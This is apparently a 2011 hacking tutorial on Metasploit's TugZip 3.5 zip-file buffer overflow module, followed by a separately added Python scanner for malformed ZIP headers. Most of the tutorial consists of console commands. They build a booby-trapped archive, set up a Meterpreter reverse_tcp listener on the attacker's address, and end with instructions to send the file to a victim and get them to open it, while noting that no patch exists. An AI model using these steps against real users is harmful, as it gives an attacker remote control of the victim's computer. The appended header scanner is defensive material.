Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows 7 SP1
Tested Vulnerable Application : TugZip 3.5
Exploit Credit : Stefan Marin, Lincoln, TecR0c, mr_me
I wrote this tutorial after browsing around Metasploit and finding this exploit.
metasploit.com describes this exploit as follows:
This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.
Don't wait too long; let's try this in your personal lab using a virtual machine.
Requirements:
1. TugZip 3.5 (download from Mediafire.com)
2. TugZip Exploit module (download link below)
Step by Step:
Attacker IP address: 192.168.8.93
Victim IP address: 192.168.8.91
1. Download TugZip from the Mediafire link above and install it on the victim computer (for testing purposes).
2. Open the Metasploit console by running the msfconsole command, then update it first with the msfupdate command to refresh the module library. If you don't have an internet connection to update, download the exploit above and put it in /pentest/exploits/framework/modules/exploit/windows/fileformat/
Use the exploit and then set up the payload (see picture below).
3. Next, configure the options this exploit needs to match your setup. To view all available options, run the show options command.
set filename h0T-clipS.zip --> set your desired filename for the malicious file
set lhost 192.168.8.93 --> the local address the payload connects back to when the exploit is successfully triggered
set lport 443 --> our local port to receive the connection from the victim
exploit --> generate the malicious file with the payload
/root/.msf4/data/exploits/h0T-clipS.zip --> the malicious file is stored in this location
4. Next we need to set up a listener to handle the reverse connection from our exploit (if it is successfully triggered).
use exploit/multi/handler --> set up a handler for the connection to our machine
set payload windows/meterpreter/reverse_tcp --> the same payload we set up above
set lhost 192.168.8.93 --> the same IP we set up above
set lport 443 --> the same local port we set up above
exploit --> start listening for an incoming connection
5. After everything has been set up, we need to send the malicious file from step 3 to the victim and make sure the victim opens it. Once the victim has opened our malicious file, our Metasploit console will have an active session on the victim system.
Countermeasures:
1. As of the time I wrote this tutorial (2011-10-15), the status is still zero-day, a.k.a. no cure.
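With no patch available, one defensive option is to screen incoming archives before a user opens them in a vulnerable utility. The Python check below is an added example, not part of this tutorial or of Metasploit; the tutorial does not say which ZIP field TugZip mishandles, so it flags structurally implausible local file headers in general, and the 255-byte filename threshold and both sample archives are constructed here.

```python
import io
import struct
import zipfile

# Added example (not from the tutorial): triage of ZIP local file headers.
# Thresholds and sample archives below are constructed for illustration.
LOCAL_HDR_SIG = b"PK\x03\x04"
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")   # 30-byte local file header
MAX_NAME_LEN = 255                           # chosen here, not a ZIP format limit


def scan_local_headers(data: bytes, max_name_len: int = MAX_NAME_LEN):
    """Walk the local file headers of a ZIP byte string and return
    (offset, reason) findings for records an archive utility could mishandle."""
    findings = []
    off = 0
    while off + LOCAL_HDR.size <= len(data):
        if data[off:off + 4] != LOCAL_HDR_SIG:
            break  # central directory or trailing data: no more entries
        (_sig, _ver, _flags, _method, _mtime, _mdate, _crc, csize, _usize,
         name_len, extra_len) = LOCAL_HDR.unpack_from(data, off)
        if name_len > max_name_len:
            findings.append((off, f"filename length {name_len} exceeds {max_name_len}"))
        body_start = off + LOCAL_HDR.size
        if body_start + name_len + extra_len > len(data):
            findings.append((off, "name/extra fields run past end of archive"))
            break
        name = data[body_start:body_start + name_len]
        if b"\x00" in name:
            findings.append((off, "NUL byte inside filename"))
        off = body_start + name_len + extra_len + csize  # skip to next header
    return findings


def benign_zip() -> bytes:
    """Constructed sample: a well-formed archive written by Python's zipfile."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "hello")
    return buf.getvalue()


def oversized_name_zip(name_len: int = 2000) -> bytes:
    """Constructed sample: one stored, empty entry whose filename length is
    far beyond any real path component (a classic malformed-header shape)."""
    hdr = LOCAL_HDR.pack(LOCAL_HDR_SIG, 20, 0, 0, 0, 0, 0, 0, 0, name_len, 0)
    return hdr + b"A" * name_len
```

A mail gateway or endpoint script can run scan_local_headers over each attachment and quarantine anything that returns findings instead of handing it to the archive utility.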
Hope it's useful
by admin : heykhend